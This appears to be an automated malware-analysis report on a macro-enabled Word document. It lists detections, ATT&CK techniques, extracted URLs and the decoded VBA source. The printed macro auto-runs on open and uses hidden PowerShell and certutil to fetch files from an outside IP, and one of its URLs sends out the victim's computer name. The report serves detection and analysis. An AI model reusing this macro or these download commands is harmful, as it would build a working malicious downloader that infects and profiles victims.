MALICIOUS
418
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros that execute upon opening the document. These macros utilize WScript.Shell to run PowerShell commands. The PowerShell commands leverage certutil to download and execute payloads from the URLs http://3.82.89.119/nra.simulation.2021/Hello, http://3.82.89.119/nra.simulation.2021/email.3.document.opened.on.host.%COMPUTERNAME%, and http://3.82.89.119/nra.simulation.2021/Bye. This indicates a downloader functionality designed to fetch and run further malicious content.
Heuristics 10
-
ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim wsh As Object Set wsh = CreateObject("WScript.Shell") wsh.Run "powershell -nop -w hidden certutil.exe -urlcache -split -f http://3.82.89.119/nra.simulation.2021/Hello %TEMP%" -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Set wsh = CreateObject("WScript.Shell") wsh.Run "powershell -nop -w hidden certutil.exe -urlcache -split -f http://3.82.89.119/nra.simulation.2021/Hello %TEMP%" wsh.Run "powershell -nop -w hidden certutil.exe -urlcache -split -f http://3.82.89.119/nra.simulation.2021/email.3.document.opened.on.host.%COMPUTERNAME% %TEMP%" -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Set wsh = CreateObject("WScript.Shell") wsh.Run "powershell -nop -w hidden certutil.exe -urlcache -split -f http://3.82.89.119/nra.simulation.2021/Hello %TEMP%" wsh.Run "powershell -nop -w hidden certutil.exe -urlcache -split -f http://3.82.89.119/nra.simulation.2021/email.3.document.opened.on.host.%COMPUTERNAME% %TEMP%" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim wsh As Object Set wsh = CreateObject("WScript.Shell") wsh.Run "powershell -nop -w hidden certutil.exe -urlcache -split -f http://3.82.89.119/nra.simulation.2021/Hello %TEMP%" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "NewMacros" Sub AutoOpen() a -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Sub Document_Open() a -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://3.82.89.119/nra.simulation.2021/Hello In document text (OOXML body / shared strings)
- http://3.82.89.119/nra.simulation.2021/email.3.document.opened.on.host.%COMPUTERNAME%In document text (OOXML body / shared strings)
- http://3.82.89.119/nra.simulation.2021/ByeIn document text (OOXML body / shared strings)
- http://3.82.89.119/nra.simulation.2021/emIn document text (OOXML body / shared strings)
- http://3.82.89.119/nra.simulation.2021/In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 937 bytes |
SHA-256: 0e5226312b8e11381732204ec02144a484176a3744a2d636b1ea959e9c3a80a5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
a
End Sub
Sub Document_Open()
a
End Sub
Sub a()
Dim wsh As Object
Set wsh = CreateObject("WScript.Shell")
wsh.Run "powershell -nop -w hidden certutil.exe -urlcache -split -f http://3.82.89.119/nra.simulation.2021/Hello %TEMP%"
wsh.Run "powershell -nop -w hidden certutil.exe -urlcache -split -f http://3.82.89.119/nra.simulation.2021/email.3.document.opened.on.host.%COMPUTERNAME% %TEMP%"
wsh.Run "powershell -nop -w hidden certutil.exe -urlcache -split -f http://3.82.89.119/nra.simulation.2021/Bye %TEMP%"
Set wsh = Nothing
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 9728 bytes |
SHA-256: 9bbc357b289487f54aa96a83a859703f928ae13e013a84dce689df56f923924c |
|||
|
Detection
ClamAV:
Doc.Downloader.Pwshell-10001336-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.